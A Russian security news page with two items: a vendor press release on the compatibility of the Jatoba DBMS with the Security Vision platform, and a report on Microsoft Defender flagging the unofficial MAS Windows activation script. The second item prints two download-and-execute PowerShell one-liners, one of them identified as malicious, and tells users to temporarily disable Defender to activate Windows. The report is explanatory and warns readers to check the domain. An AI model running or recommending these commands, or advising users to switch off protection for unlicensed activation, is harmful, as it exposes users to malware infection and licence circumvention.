Security Vision и Газинформсервис объединили возможности своих продуктов

Security Vision и Газинформсервис объединили возможности своих продуктов

Security Vision и Газинформсервис объединили возможности своих продуктов

Security Vision и «Газинформсервис» подтвердили совместимость защищенной системы управления базами данных (СУБД) Jatoba и автоматизированной платформы информационной безопасности Security Vision в ходе всестороннего тестирования.

Успешная интеграция этих продуктов позволит заказчикам повысить эффективность и безопасность работы с данными, а также даст возможность реализовывать проекты по автоматизации процессов информационной безопасности с использованием отечественной СУБД из реестра российских программ для электронно-вычислительных машин и баз данных, сертифицированной ФСТЭК по 4 уровню доверия.

Защищенная СУБД Jatoba является отечественной разработкой, предоставляющей пользователям возможность защиты данных: обфускацию хранимых процедур и функций, SQL Firewall, а также возможность создания кластеров для отказоустойчивых, распределенных и высоконагруженных систем. Базируется на свободном программном обеспечении СУБД PostgreSQL.

Платформа автоматизации и роботизации процессов обеспечения информационной безопасности Security Vision – ИТ-платформа low code/no code, позволяющая роботизировать до 95% программно-технических ИТ/ИБ функций за счёт:

  • создания элементов саморегулирующихся программных средств с использованием математических методов для высвобождения человека от участия в рутинных операциях и процессах получения, преобразования, передачи и использования информации;
  • использования алгоритмов и методов машинного обучения;
  • использования алгоритмов предиктивной аналитики больших данных и когнитивного поиска информации.

«Компания «Газинформсервис» очень нравится нам по духу. Коллеги стараются вести работу по принципу неравнодушного отношения к делу, и мы видим, что это, действительно, дает свои плоды. Выходят новые линейки продуктов, непрерывно происходит совершенствование существующих, и, как следствие, появляется всё больше довольных клиентов, использующих решения. Когда коллеги предложили нам реализовать интеграцию решений, обсудив видимую ценность этого, мы сразу же согласились. Очень важно сейчас, чтобы российские компании объединялись и объединяли усилия с пользой для клиентов», отмечает коммерческий директор компании SecurityVisionЕкатерина Черун. 

«Обеспечение информационной безопасности остается одной из первостепенных задач для крупного бизнеса. Совместимость программного обеспечения дает возможность расширять спектр защиты. Мы рады предоставить пользователям ПО Security Vision такие важные функции, как безопасность и производительность, которые есть в нашей СУБД Jatoba», – говорит заместитель генерального директора – директор департамента организации работ с заказчиками компании «Газинформсервис» Роман Пустарнаков.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru